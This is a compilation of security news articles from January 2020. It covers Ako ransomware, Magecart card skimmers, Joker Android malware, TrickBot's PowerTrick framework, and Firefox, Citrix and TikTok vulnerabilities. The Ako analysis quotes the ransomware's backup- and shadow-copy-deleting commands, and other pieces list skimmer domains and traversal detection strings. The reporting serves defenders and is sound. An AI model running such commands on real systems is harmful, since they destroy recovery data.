How Ako Ransomware encrypts a device
When started, Ako will first execute the following commands to delete shadow volume copies, clear recent backups, and disable the Windows recovery environment.

vssadmin.exe Delete Shadows /All /Quiet
bcdedit.exe /set {default} recoveryenabled No
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
wbadmin DELETE SYSTEMSTATEBACKUP
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
wmic.exe SHADOWCOPY /nointeractive
It will also create the Registry value EnableLinkedConnections under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System registry key and set it to 1. This is done to make sure mapped drives are accessible even in a UAC launched process.

The ransomware will now begin to encrypt files on the device.

When encrypting files, Ako will encrypt all files that do not match the ".exe,. dll, .sys, .ini, .lnk, .key, .rdp" extensions and whose paths do not contain the following strings:

Folder Blacklist:
$,AppData
Program Files
Program Files (x86)
AppData
boot
PerfLogs
ProgramData
Google
Intel
Microsoft
Application Data
Tor Browser
Windows
When a file is encrypted, it will be renamed to and a randomly generated extension will be appended to the file name. For example, 1.doc would be encrypted and renamed to 1.doc.Ci3Qn3 as shown below.

Encrypted Files
Encrypted Files
Appended to the contents of each file will also be a CECAEFBE file marker that can be used to identify that this file was encrypted by Ako. This file marker can be seen in the hex editor of an encrypted file below.

CECAEFBE File Marker
CECAEFBE File Marker
During the encryption process, Ako will use the GetAdaptersInfo function to get a list of network adapters and their associated IP addresses.

The ransom will then perform a ping scan of any local networks using the IcmpSendEcho function to create a list of responding machines.

Any machines that respond, will be checked for network shares to encrypt as well.

When the ransomware is finished, the encryption key used to encrypt the victim's files will itself be encrypted and stored in a file named id.key on the victim's Windows desktop.

Encrypted encryption key
Encrypted encryption key
Also on the desktop will be a ransom note named ako-readme.txt. This note contains a URL to access the Ako Tor payment site in order to get payment instructions. This site is located at http://kwvhrdibgmmpkhkidrby4mccwqpds5za6uo2thcw5gz75qncv7rbhyad.onion.

Ako Ransom Note
Ako Ransom Note
Note how the ransom note states that "Your network have been locked" to indicate they are targeting networks and not individual devices. When we asked the ransomware developers whether they target both both networks and individual workstations, they told BleepingComputer that they are "Only working on network."

Included in the ransom note is a 'Personal ID' that when decoded becomes a JSON formatted object containing the extension, encrypted key, network configuration setting, a subid most likely used for affiliates, and the ransomware's version. The version is currently at .5.

Decoded Personal ID
Decoded Personal ID
When a victim accesses the Tor site they will need to enter their personal ID to see the ransom demand and instructions.

Tor Payment Site
Tor Payment Site
This Tor payment site also includes a chat service and the ability to decrypt 1 file, which is a bit low as most ransomware infections allow the decryption of at least three files.

Unfortunately, in a brief analysis by ID-Ransomware owner Michael Gillespie, the encryption method used by Ako appears to be secure.

If a weakness is discovered, we will be sure to post more information. For now, if you wish to discuss this ransomware or need help, you can use our Ako Ransomware Support & Help topic.

Furthermore, it is not known how this ransomware is distributed but is most likely through hacked Remote Desktop services. If you are affected by this ransomware, we would be interested in learning how your network became infected.


Card-Stealing Scripts Infect Perricone's European Skin Care Sites
12.1.2020 
Bleepingcomputer  CyberCrime  Virus

Multiple European websites for the Perricone MD anti-aging skin-care brand have been compromised with scripts that steal customer payment card info when making a purchase.

Two MageCart groups were competing for the credit card data on Perricone MD websites in the U.K., Italy, and Germany, but current evidence shows that only one exfiltrated the details successfully.

Two scripts, one winner
The first malicious script was planted on the Perricone websites more than a year ago, in November 2018. It was supposed to deliver the card data to the attacker's domain but a coding error prevented it from loading.

Even if the script worked as intended by the attacker, it still stood no chance to skim the payment data. That's because the second, more complex script, detected the competing web skimmer and altered the code so that the host domain could not be reached to download the malicious script.


Sam Jenkins of RapidSpike found that the buggy code attempted to contact js-react[.]com, a domain that is known to security researchers from many other breaches of websites running a vulnerable version of the Magento e-commerce platform.

This looks like the same bullying scenario documented in November 2018, where Group 9 and 3 clashed on the websites of Umbro Brazil and the B.Liv online cosmetics shop.

The sabotaging script was injected on the Perricone websites in November last year and loaded only on the checkout page to stay undetected. Hiding its presence on the compromised was also done by using a domain similar to that of the victim's - perriconemd.me[.]uk.


Checking the malicious domain, Jenkins found it was on a server in Japan (124.156.210.169) that hosted other domains associated with illegal activity like data breaches and credit card theft:

ajaxstatic.com
section.ws
jspack.pro
cdndeskpro.com
kegland.top
lightgetjs.com
rackapijs.com
lightgetjs.com
autojspack.com
fbpixelget.com
gstaticapi.com
RapidSpike contacted Perricone MD and disclosed the issues on the websites, also offering their help to fix the problem. However, after the security researchers shared the details, communication stopped.

The malicious code is still present on the three Perricone MD's websites but it does not load for all customers. Jenkins speculates that this behavior might be caused by the code filtering the victims based on country or on the device used to access the websites, but at the moment he has no evidence to support this theory.

Perricone MD customers that made a purchase last year should check for irregular card transactions and report any of them to the bank.


Google Removed Over 1.7K Joker Malware Infected Apps from Play Store
12.1.2020 
Bleepingcomputer  Android  Virus

Roughly 1,700 applications infected with the Joker Android malware (also known as Bread) have been detected and removed by Google's Play Protect from the Play Store since the company started tracking it in early 2017.

At least one series of such malicious apps did manage to get into the Play Store as discovered by CSIS Security Group security researchers who found 24 apps with over 472,000 downloads in total during September 2019.

"Sheer volume appears to be the preferred approach for Bread developers," says Google. "At different times, we have seen three or more active variants using different approaches or targeting different carriers. [..] At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day."

Malware used for billing fraud
Such malicious Android apps were originally designed by Joker's creators to perform SMS fraud, but have since "largely abandoned this for WAP billing following the introduction of new Play policies restricting use of the SEND_SMS permission and increased coverage by Google Play Protect."

Newer versions of the Joker malware have moved to another type of mobile billing fraud dubbed toll fraud. Using this new technique, the malware's operators make use of malicious apps to trick victims into subscribing to or purchasing various types of content via their mobile phone bill.

"Both of the billing methods detailed above provide device verification, but not user verification," Android Security & Privacy Team's Alec Guertin and Vadim Kotov explain.

"The carrier can determine that the request originates from the user’s device, but does not require any interaction from the user that cannot be automated.

Some of the countries targeted by the Joker malware
Some of the countries targeted by the Joker malware (CSIS Security Group)
To be able to automate the malicious billing process without needing any user interaction, the malware authors take advantage of injected clicks, custom HTML parsers, and SMS receivers.

In a lot of cases, the users who get their Android devices infected with Joker malware would also discover that the app features would not match the app they installed.

Joker apps would also frequently come with no other functionality beyond the billing process and, in some instances, would simply be clones of other popular apps in the Google Play Store.

"Google Play Protect scans over 50 billion apps every day across more than two billion devices," according to the Android Security & Privacy 2018 Year In Review report published in March 2019.

"By analyzing and reviewing upwards of 500,000 apps daily in its cloud-based vetting process, Google Play Protect helps keep harmful apps from ever reaching Google Play."

As revealed by Google in the 2018 Google Play Store yearly review, they rejected 55% more Android apps than in 2017 and increased the app suspension rate by approximately 66% year-over-year.

Just to put things into perspective, while the 2018 yearly review does not provide the exact number of removed malicious apps, the 2017 one said that the company "took down more than 700,000 apps that violated the Google Play policies, 70% more than the apps taken down in 2016."

Joker malware authors forced to adapt
The Joker malware's creators were continually forced to change tactics to search for gaps in the Play Store's defenses as Google introduced new policies and Google Play Protect scaled defenses.

"They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected," Google says.

"Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere."

More details on the inner workings of the Joker (aka Bread) malware, as well as indicators of compromise including package names and malware sample hashes, are available in Google's full report.


KDE Plasma Welcomes Windows 7 Refugees to the Linux Side
12.1.2020 
Bleepingcomputer  OS

The KDE Community wants Windows 7 users to migrate to the Plasma desktop environment after Microsoft's 10-year-old OS will reach end of support next week and stops receiving security and bug fixes.

"The specific end of support day for Windows 7 will be January 14, 2020," Microsoft says. "After that, technical assistance and software updates from Windows Update that help protect your PC will no longer be available for the product."

"Therefore, it's important that you upgrade to a modern operating system such as Windows 10, which can provide the latest security updates to help keep you and your data safer."

The Plasma and Linux alternative
Since Windows 7 will no longer receive bug fixes and security updates, and will leave its users exposed to attacks devised to exploit new vulnerabilities, The KDE Community says that it wants to help them migrate to one of the 25 Linux distributions offering support for Plasma.

"Instead of migrating to Windows 10 and putting up with hours of updates, intrusions on your privacy and annoying ads built into your apps, install a Linux operating system with Plasma," KDE says.

"In 30 minutes you will be up and running and you will have all the security and stability of a Linux system, with all the features and ease of use of Plasma."

KDE's move to advertise Plasma to future Windows 7 refugees could attract huge amounts of new users to the Linux side given that Windows currently owns more than 77% of the global desktop market, while all Linux desktops combined don't go above 2%.

Out of the 77% market share slice, over 26% are Windows 7 users amounting to roughly one billion people that can't let go of Windows 7 because they either don't like Windows 10 or are scared of the change.

KDE also provides a video that recommends upgrading from Windows 7 to KDE Plasma and shows how one can easily make the Plasma desktop look and behave like a Windows 7 desktop, making the transition to Linux a lot easier.

If you decide to make the jump, you can replicate the desktop shown in the video using the following settings:

• Plasma Theme: Seven Black
• Window Decorations: Seven Black
• Application Style: gtk2
• GTK Theme: Windows Se7en by Elbullazul
• Icons: Darkine
• Colors: Breeze Light
• Cursors: DMZ White
• Splash Screen: Feren OS
• Panel: 38 height
• Widgets: Default Apps Menu, I-O Task Manager, Stock System Tray, Feren Calendar or Event Calendar, Win7 Show Desktop

Windows apps and games on Linux
According to KDE, Plasma is also highly adaptable and can be tweaked to behave like other OSs too, including macOS, Ubuntu, and many others, making it the perfect environment for users of other platforms who want to switch to Linux.

When it comes to apps, KDE says that "you will find many programs included alongside Plasma. There are office applications, web browsers, audio and video players, programs for design, or for editing audio and video...

The list is endless. And it is easy to add more: use your software manager and you will find that installing software requires just a few clicks."

If you have to also run a specific Windows program on Linux, the Wine compatibility layer will most probably allow you to use most Windows apps.

Plasma desktop with Windows 7 theme
Plasma desktop with Windows 7 theme (KDE)
Linux is also pretty good at gaming nowadays given that there are a lot of games that now come with native Linux support, while Proton, a tool used by Steam Play to provide Windows compatibility, will allow you to run a lot of other games using a custom version of Wine with a gaming focus.

If you are a Windows 7 user and want to find out more about moving to a Linux distro with pre-installed Plasma and KDE applications, you can go to https://kde.org/distributions.

"Helping people regain control over their systems and protecting their data is precisely what Free Software communities do best, making this the perfect opportunity to help Windows 7 users upgrade to something much better," KDE concludes.


Windows 10 Feature Updates Stop Including Drivers Needing Approval
12.1.2020 
Bleepingcomputer  OS

Microsoft says that drivers requiring approval will no longer be released during and around Windows 10 feature update rollouts and Patch Tuesdays (Monthly Quality and Security updates issued on the second Tuesday of each month).

Drivers needing approval fall into one of the following categories:

• Flighted drivers: Drivers (Shipping Label) marked as Automatic = Critical Update (CU) or Dynamic Update (DU) or both
• Optional driver classes which always go through Shiproom approval

This information was made available via an update to the Driver Shiproom release cadence for 2020, originally shared under NDA with Hardware Dev Center users.

"Recently when a driver update is released alongside OS updates, it has resulted in a poor experience and significantly impacted end-users," Microsoft stated.

"Occasionally, we have had other driver release incidents which occur outside of normal business hours (Redmond time) which impact our ability to intervene and prevent additional devices from receiving 'poor' drivers."

Redmond also states that partners have also made requests for access to a predictable driver release cadence.

Driver deferrals around feature and security updates
The decision of deferring the release of drivers marked as needing approval around Patch Tuesdays and Windows 10 Feature updates was taken to ensure the release of "quality drivers, reduce the risk of releasing drivers at the same time as OS changes and provide ecosystem partners a predictable driver release cadence."

Drivers requiring "Microsoft Approval" will also not be released one day before and after Patch Tuesdays, and two days around feature OS update rollouts.

Driver release windows

'We believe that creating a predictable driver release cadence will result in better update user experience across both Windows 10 OS and driver updates," Microsoft said.

"We encourage ecosystem partners to plan for their driver flighting and publication releases in alignment with the above cadence and help us improve the experience of our mutual users and customers."

2020 driver deferral calendar
2020 driver deferral calendar (Microsoft)
Exceptions and Windows update block requests
Microsoft adds that partners can request Windows update blocks to devices running drivers with known compatibility issues to prevent issues that will impact the OS after the update is applied.

The feature update blocks can be requested while a compatible driver is being validated by the partner to prevent issues like driver crashes, BSODs or data loss, security issues, or connectivity losses.

"These devices are blocked until the fix is released via servicing, at which point the device is then unblocked," Microsoft added. "This does not impact media installs."

Partners will also be able to request the release of "critical/security driver updates during the limited driver release windows," requests that will be handled by the Windows Update team via an exception process.

To request an exception for drivers needing immediate release, partners are required to open a Hardware Dev Center Partner Support Request (ticket) using a "Driver release deferral exception request" title.

Microsoft also asks for info on the Shipping Label ID(s), the reason for "Urgent Driver release request," and the impact to end-users of a driver release delay.

It is not yet known if Microsoft can deny partner requests for Windows update blocks or requests for driver deferral exceptions.


Sodinokibi Ransomware Says Travelex Will Pay, One Way or Another
12.1.2020 
Bleepingcomputer  Ransomware

The attackers behind the Sodinokibi Ransomware are applying pressure on Travelex to pay a multi-million dollar ransom by stating they will release or sell stolen data that allegedly contains customer's personal information.

In a New Year's Eve ransomware attack on Travelex, the Sodinokibi Ransomware operators allegedly stole 5GB of unencrypted files and then proceeded to encrypt the foreign currency exchange company's entire network.

In a conversation with BleepingComputer, the Sodinokibi Ransomware actors state that they were demanding a $3 million ransom or they would release the data containing "DOB SSN CC and other". This amount was later changed to $6 million.

In a statement by Travelex, the currency exchange company is stating that there is no evidence that any data was stolen.

"Whilst the investigation is still ongoing, Travelex has confirmed that the software virus is ransomware known as Sodinokibi, also commonly referred to as REvil. Travelex has proactively taken steps to contain the spread of the ransomware, which has been successful. To date, the company can confirm that whilst there has been some data encryption, there is no evidence that structured personal customer data has been encrypted. Whist Travelex does not yet have a complete picture of all the data that has been encrypted, there is still no evidence to date that any data has been exfiltrated."

The Sodinokibi actors, though, paint a different picture.

When told that Travelex was denying any data was stolen, they told BleepingComputer that they were currently negotiating the ransom price with Travelex and that they would benefit even if a ransom is not paid.

"If this were true, they would not bargain with us now. On the other hand, we do not care. We will still benefit if they do not pay. Just the damage to them will be more serious."

When we were told this, it was not 100% clear how the ransomware operators would benefit.

This became clear in a recent forum post to a Russian hacker and malware forum where the public representative for the REvil/Sodinokibi Ransomware stated that if Travelex does not pay the ransom, they will sell the stolen PII information of their customers to other attackers.

Sodinokibi post to a Russian hacker forum
Sodinokibi post to a Russian hacker forum
This post translated to English as:

There are no seats. And not planned. Travelex recommend starting to raise funds for payment, or DOB + SSN + CC will be sold to anyone.
The statement "There are not seats." in Unknown's post means that REvil is not accepting any new affiliates at this time.

The user named 'Unknown' is the public-facing representative of the Sodinokibi Ransomware and has made forum posts in the past when the ransomware first launched and they began building a team of affiliates composed of veteran malware distributors.

Ransomware operators have been threatening to release stolen data for some time, but none carried out their threats until the Maze Ransomware group released the stolen data of Allied Universal.

Since then, Unknown has also stated that Sodinokibi Ransomware will adopt the tactic of releasing stolen data as leverage to get victims to pay.

Unknown's post about releasing stolen data
Unknown's post about releasing stolen data
To this date, Sodinokibi has not released any stolen data and it is not known for sure if they will release Travelex's if the ransom is not paid.

However, if the data is released, it will open up a whole new world of business problems for Travelex

The Sodinokibi actors are right, too. No matter what happens, Travelex will incur further damage; either through the payment of a ransom, the public release of their data, or by the data being sold to other threat actors.

If the data is released, the attack will need to be classified as a data breach, notifications and free monitoring services will need to be offered, GDPR fines would be likely as are the risks of class action lawsuits.

BleepingComputer has contacted Travelex with questions regarding this story, but has not heard back.

Transparency in ransomware attacks is necessary
When an organization suffers a ransomware attack, they usually try to hide the attack or downplay its impact to prevent customer concerns, damage to brand image, and a plunging stock price.

This commonly, though, backfires as the severity of the attacks ultimately leak and make the company look worse than if they had been transparent about it in the first place.

Now that many ransomware attackers are claiming to steal data before encrypting devices, it is more important than ever to be transparent about these attacks as they could now be classified as data breaches.

By hiding this information, companies are more likely to be hit with government fines and lawsuits as customers' personal information is compromised.

Instead, companies should follow Norsk Hydro's lead and be fully transparent during a ransomware attack by providing timely updates, customer notifications, and public information.

This approach not only made Norsk Hydro customers feel better but also increased their brand image.


TrickBot Gang Created a Custom Post-Exploitation Framework
12.1.2020 
Bleepingcomputer  BotNet  Exploit

Instead of relying on premade and well-known toolkits, the threat actors behind the TrickBot trojan decided to develop a private post-exploitation toolkit called PowerTrick to spread malware laterally throughout a network.

When an attacker gains access to a victim's network, they will attempt to quietly gain access to user and administrator credentials and then laterally spread to the other devices on the network.

This type of lateral movement is typically done through post-exploitation toolkits or frameworks, such as PowerShell Empire, that makes it easier to harvest credentials, execute commands on computers, and deploy malware.

It starts with a backdoor
To generate the most revenue during a network compromise, TrickBot has started to focus more on the enterprise environment with the release of new modules and by partnering with the Ryuk ransomware actors.

"TrickBot has shifted focus to enterprise environments over the years to incorporate everything from network profiling, mass data collection, incorporation of lateral traversal exploits. This focus shift is also prevalent in their incorporation of malware and techniques in their tertiary deliveries that are targeting enterprise environments. It is similar to a company where the focus shifts depending on what generates the best revenue," the SentinelLabs researchers explained in a new report shared with BleepingComputer.

PowerTrick acts as a fileless post-exploitation framework developed by the TrickBot actors that allow its operators to perform stealthy and persistent reconnaissance and lateral compromises inside of networks that have been determined to be of high value.

PowerTrick Human Network Exploitation Operator
PowerTrick Human Network Exploitation Operator
(Source: SentinelLabs)
While existing post-exploitation frameworks exist, such as PowerShell Empire, the TrickBot actors decided to create a private framework to evade detection and to create a tool that satisfies their own particular needs.

"Lots of discourse was about OSINT offensive tools used by malware operators - here, the TrickBot actors used their own tools to evade detection," Vitali Kremez, Head of SentinelLabs, told BleepingComputer.

Similar to PowerShell Empire, on networks where PowerTrick is deployed, the initial "staging" program will download a more feature-rich backdoor that allows the attacker to execute further PowerShell commands, harvest credentials, install additional backdoors, and spread laterally throughout the network.

PowerTrick Payloads
PowerTrick Payloads
(Source: SentinelLabs)
Some of the tools seen being installed by PowerTrick include the TrickBot Anchor malware and the 'More_Eggs' JavaScript backdoor. These tools are installed through the PowerTrick reverse shell by executing PowerShell commands that download the software.

Anchor download command
Anchor download command
In addition to the malware payloads, PowerTrick will also allow the actor to issue commands that are 'hexified" to bypass security solutions.

Direct shell commands
Direct shell commands
(Source: SentinelLabs)
As PowerShell Empire and other well-known post-exploitation frameworks are commonly detected by security solutions, by creating a private fileless framework, the TrickBot actors can evade these solutions.

"The top-tier cybercrime enterprise offensive tooling such as “PowerTrick” is flexible and effective which allows the TrickBot cybercrime actors to leverage them to augment on the fly and stay stealthy as opposed to using larger more open source systems such as PowerShell Empire," Kremez told BleepingComputer. "The end-goal of the PowerTrick backdoor and its approach is to bypass restrictions and security controls to adapt to the new age of security controls and exploit the most protected and secure high-value networks."

Fake PowerTrick C2 created for testing network security
To assist organizations in testing their network security against PowerTrick, SentinelLabs has created a mock command and control panel and various PowerShell commands that emulate PowerTrick communication.

Using this mock panel and the PowerShell commands, organizations can test their network security solutions against the PowerTrick communication to make sure it is detected.

To further help, SentinelLabs has created a variety of Suricata rules that can be used to detect malicious traffic associated with this framework.


Cryptojacking Drops by 78% in Southeast Asia After INTERPOL Action
12.1.2020 
Bleepingcomputer  BigBrothers  Cryptocurrency

The number of routers infected with coin miners dropped by 78% in countries of the ASEAN (Association of Southeast Asian Nations) region following a five-month-long operation coordinated by the INTERPOL.

Cryptojacking is the process through which a malicious actor infects victims' devices with coin miners designed to take advantage of computing resources to surreptitiously mine for cryptocurrency.

INTERPOL (short for International Criminal Police Organization) is an inter-governmental organization that helps police from 194 member countries to cooperate in combating crime.

Operation Goldfish Alpha
INTERPOL's Operation Goldfish Alpha launched in June 2019 allowed cybercrime investigators and experts from 10 ASEAN countries (Brunei, Cambodia, Indonesia, Laos, Malaysia, Myanmar, Philippines, Singapore, Thailand, and Vietnam) to detect infected routers.

They also alerted the victims and patched the compromised devices removing the coin miners and blocking the cybercriminals' access to the routers.

At the start of the operation, INTERPOL was able to identify over 20,000 hacked routers in the ASEAN region, accounting for 18 percent of cryptojacking infections globally.

"When the operation concluded in late November, the number of infected devices had been reduced by 78 percent," says the INTERPOL. "Efforts to remove the infections from the remaining devices continue."

INTERPOL’s Director of Cybercrime, Craig Jones
INTERPOL’s Director of Cybercrime, Craig Jones (INTERPOL)
INTERPOL's press release adds that private sector partners including Trend Micro and Cyber Defense Institute supported Operation Goldfish Alpha by sharing information on cryptojacking cases.

The partners also provided security experts from participating countries with guidelines on how to patch infected routers, as well as recommendations on preventing future crytojacking infections.

"When faced with emerging cybercrimes like cryptojacking, the importance of strong partnerships between police and the cybersecurity industry cannot be overstated," INTERPOL’s Director of Cybercrime Craig Jones said.

"By combining the expertise and data on cyberthreats held by the private sector with the investigative capabilities of law enforcement, we can best protect our communities from all forms of cybercrime."


Windows 10 Insider Build 19541 Warns If Apps Are Using Your Location
12.1.2020 
Bleepingcomputer  OS
Windows 10 Build 19013 Out With New DirectX 12 Features for Insiders

Microsoft has released Windows 10 Insider Preview Build 19541 to Insiders in the Fast ring, which now allows you to list the architecture of processes listed in Task Manager and Windows will now notify you when an application is using location services.

If you are a Windows Insider in the Fast ring, you can update to the Insider Preview Build 19541 by going into Settings -> Update & Security -> Windows Update and then checking for new updates.

Windows 10 Insider Build 19541

Microsoft also warned that they are investigating reports of build updates hanging for a long time. If this occurs while installing this build, just give it time to complete.

We’re looking into reports of the update process hanging for extended periods of time when attempting to install a new build.

To see the full release notes and fixes for this Windows 10 insider build, you can read the blog post.

The most notable changes found in this new build released to Windows Insiders in the Fast ring are detailed below.

Location services in-use indicator
Microsoft has updated the Notification area icon so that it now indicates when an application is using location services in Windows 10.

New Location in-use indicator
New Location in-use indicator
Process architecture is now shown in Task Manager
Similar to how third-party task managers work, like Process Explorer, you can now enable the task manager to display the architecture (x64 or x86) of the listed processes.


This feature is useful from a security perspective as it can be used to spot 32-bit malware impersonating Microsoft executables. For example, if svchost.exe is listed as a x86 process then you know it's malware as the legitimate version is x64 architecture.

General changes, improvements, and fixes for PC
We fixed an issue impacted System Settings reliability.
We fixed an issue that could result in Windows Update “Reboot needed” notifications persisting reboot.
We fixed an issue that could result in the update speed in Task Manager unexpectedly being set to Paused.
We fixed an issue when using Narrator that could result in Start not saying the correct index of an app in the all apps list.
We fixed an issue where the Search window wasn’t showing acrylic at the top.
We fixed an issue from the previous build resulting in the Feedback Hub unexpectedly not showing store apps in the list of contexts when logging feedback under the Apps category. This same issue resulted in the symptom of apps continuing to show Install in the Microsoft Store, rather than Launch, after the app had been installed.
Known issues
BattlEye and Microsoft have found incompatibility issues due to changes in the operating system between some Insider Preview builds and certain versions of BattlEye anti-cheat software. To safeguard Insiders who might have these versions installed on their PC, we have applied a compatibility hold on these devices from being offered affected builds of Windows Insider Preview. See this article for details.
We’re looking into reports of the update process hanging for extended periods of time when attempting to install a new build.
We’re looking into reports of certain external USB 3.0 drives not responding with Start Code 10 after they’re attached.
The Optimize Drives Control Panel is incorrectly reporting that optimization has never run on some devices. Optimization is completing successfully, even though it is not reflected in the UI.
The Documents section under Privacy has a broken icon (just a rectangle).
Remote Desktop Connection crashes when attempting to connect to multiple sessions.
Snipping isn’t working on secondary monitors.
Timeline isn’t showing any activities.
We’re investigating reports that Outlook search isn’t working for some Insiders.


Mozilla Firefox 72.0.1 Patches Actively Exploited Zero-Day
12.1.2020 
Bleepingcomputer  Exploit  Vulnerebility

Mozilla released Firefox 72.0.1 and Firefox ESR 68.4.1 to patch a critical and actively exploited severity vulnerability that could potentially allow attackers to execute code or trigger crashes on machines running vulnerable Firefox versions.

As Mozilla's security advisory says, the Firefox developers are "aware of targeted attacks in the wild abusing this flaw" which could make it possible for attackers who successfully exploit it to abuse affected systems.

The Firefox and Firefox ESR zero-day flaw fixed by Mozilla was reported by a research team from Qihoo 360 ATA.

BleepingComputer has reached out to the Qihoo 360 ATA researchers for additional details but had not heard back at the time of this publication.

Mozilla Firefox 72.0.1

The type confusion vulnerability tracked as CVE-2019-17026 impacts the web browser's IonMonkey Just-In-Time (JIT) compiler and it occurs when incorrect alias information is fed for setting array elements.

This type of security flaw can lead to out-of-bounds memory access in languages without memory safety which, in some circumstances, can lead to code execution or exploitable crashes.

Potential attackers could trigger the type confusion flaw by redirecting users of unpatched Firefox versions to maliciously crafted web pages.

CVE-2019-17026

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also issued an alert saying that "an attacker could exploit this vulnerability to take control of an affected system," and advising users to review the Mozilla Security Advisory and apply the security update.

While there is no other info related to this 0-day flaw, all users should install the patched Firefox release by manually checking for the new update by going to the Firefox menu -> Help -> About Firefox.

You can also download the latest patched version for Windows, macOS, and Linux from the following links:

Firefox 72.0.1 for Windows 64-bit
Firefox 72.0.1 for Windows 32-bit
Firefox 72.0.1 for macOS
Firefox 72.0.1 for Linux 64-bit
Firefox 72.0.1 for Linux 32-bit
This security patch comes a day after Firefox 72.0 was released with fixes for another 11 security vulnerabilities, give of them being classified as 'High', five classified as 'Medium', and one as 'Low'.

Of the five high severity vulnerabilities, four could potentially be used by attackers for arbitrary code execution after leading victims to specially crafted malicious pages.

In June 2019, Mozilla patched two other actively exploited zero-day vulnerabilities used in targeted attacks against cryptocurrency firms such as Coinbase.


Attackers Are Scanning for Vulnerable Citrix Servers, Secure Now
12.1.2020 
Bleepingcomputer  Vulnerebility

Security researchers have observed ongoing scans for Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) servers vulnerable to attacks exploiting CVE-2019-19781 during the last week.

This vulnerability impacts multiple Citrix products and it could potentially expose the networks of over 80,000 firms to hacking attacks according to a Positive Technologies report from December.

As the security outfit said at the time, "at least 80,000 companies in 158 countries are potentially at risk," with the top 5 countries being "the United States (the absolute leader, with over 38 percent of all vulnerable organizations), the UK, Germany, the Netherlands, and Australia."

"Depending on specific configuration, Citrix applications can be used for connecting to workstations and critical business systems (including ERP)," Positive Technologies added. "In almost every case, Citrix applications are accessible on the company network perimeter, and are therefore the first to be attacked."

No public exploits available
CVE-2019-19781 comes with a 9.8 Critical CVSS v3.1 base score and it could allow unauthenticated attackers to perform arbitrary code execution via Directory Traversal if successfully exploited.

However, as security researcher Kevin Beaumont who shared the info on active CVE-2019-19781 scans on Twitter said, currently no exploitation of this security issue has been observed and no information on an exploit is publicly available so far.

In my Citrix ADC honeypot, CVE-2019-19781 is being probed with attackers reading sensitive credential config files remotely using ../ directory traversal (a variant of this issue). So this is in the wild, active exploitation starting up. https://t.co/pDZ2lplSBj

— Kevin Beaumont (@GossiTheDog) January 8, 2020
SANS Technology Institute's Dean of Research Johannes B. Ullrich who monitored scans for vulnerable Citrix systems during the last week also confirmed that no active exploitation has been observed and no public exploits are yet available.

Despite this, he also added that credible sources "have indicated that they were able to create a code execution exploit."

According to Citrix, CVE-2019-19781 affects all supported product versions and platforms:

• Citrix ADC and Citrix Gateway version 13.0 all supported builds
• Citrix ADC and NetScaler Gateway version 12.1 all supported builds
• Citrix ADC and NetScaler Gateway version 12.0 all supported builds
• Citrix ADC and NetScaler Gateway version 11.1 all supported builds
• Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

Mitigation measures
While Citrix hasn't yet released a firmware patch to address this security flaw, the company did publish a set of mitigation measures for standalone systems and clusters and it strongly recommends all impacted customers to apply them as soon as possible.

"Customers should then upgrade all of their vulnerable appliances to a fixed version of the appliance firmware when released," Citrix also says.

To be alerted when updated firmware will be available for impacted Citrix products, customers are also advised to subscribe to bulletin alerts here.

Nextron Systems's Florian Roth also provides a Sigma detection rule for SIEM systems for detecting CVE-2019-19781 exploitation attempts against Citrix Netscaler, Application Delivery Controller, and Citrix Gateway Attack.

This rule will check the web request and if it contains '/../vpns/' or '/vpns/cfg/smb.conf', will log it as a critical alert.

"Citrix applications are widely used in corporate networks. This includes their use for providing terminal access of employees to internal company applications from any device via the Internet," Positive Technologies's Director of Security Audit Department Dmitry Serebryannikov says.

"Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat."


TikTok Flaws Allowed Hackers to Delete Videos, Steal User Info
12.1.2020 
Bleepingcomputer  Vulnerebility

Security researchers found several vulnerabilities within TikTok’s infrastructure that made it possible for potential attackers to hijack accounts to manipulate users' videos and steal their personal information.

TikTok is a social media platform owned by Beijing-based ByteDance, with offices around the world, servers based in the countries where its iOS and Android apps operate, and it is used for sharing short-form looping mobile videos of 3 to 60 seconds.

The platform's Android app currently has over 500,000,000 installs according to Google Play Store stats and has crossed the 1.5 billion installs mark on all mobile platforms during November 2019 according to Sensor Tower Store Intelligence estimates.

TikTok's applications and its backend were vulnerable to attacks as Check Point researchers state in a report shared with Bleeping Computer earlier this week.

The security issues were disclosed to ByteDance during late November, with the company fixing the vulnerabilities within one month.

"Data is pervasive but data breaches are becoming an epidemic, and our latest research shows that the most popular apps are still at risk," Check Point’s Head of Product Vulnerability Research Oded Vanunu said.

"Social media applications are highly targeted for vulnerabilities as they provide a good source for private data and offer a good attack surface gate."

TikTok's vulnerable SMS system
TikTok's SMS system allowed the Check Point research team to manipulate account data by adding and deleting videos, to demonstrate privacy encroachment issues by changing video privacy settings from private to public, and to exfiltrate personal user data including full name, email address, and birthday.

As shown by Check Point Research, attackers could have exploited these vulnerabilities via TikTok's SMS system to:

• Upload unauthorized videos and deleting users' videos
• Move users' videos from private to public
• Steal sensitive personal data
To be able to perform these malicious actions, hackers could send app download links to any user's phone number via text messages by impersonating TikTok which allowed them to inject and execute malicious code.

Additionally, attackers could redirect TikTok users onto a web server they controlled using the same tactic controlled thus making it possible for the hackers to send unwanted requests on behalf of their victims.

Potential attackers could have used "the same technique to redirect a victim to a malicious website under the guise of tiktok.com," Check Point Research also found.

"The redirection opens the possibility of accomplishing Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS), and Sensitive Data Exposure attacks without user consent."

TikTok Security Team's Luke Deshotels said that "TikTok is committed to protecting user data. Like many organizations, we encourage responsible security researchers to privately disclose zero day vulnerabilities to us.

Before public disclosure, CheckPoint agreed that all reported issues were patched in the latest version of our app. We hope that this successful resolution will encourage future collaboration with security researchers."

TikTok now banned on U.S. military phones
Check Point Research's disclosure comes right after U.S. military branches including the Army, Navy, Marine Corps, and Air Force banned the Chinese-owned TikTok app from soldiers' government-issued smartphones.

"It is considered a cyber threat," Army spokeswoman Lt. Col. Robin Ochoa said according to a Military.com report from December 30. "We do not allow it on government phones."

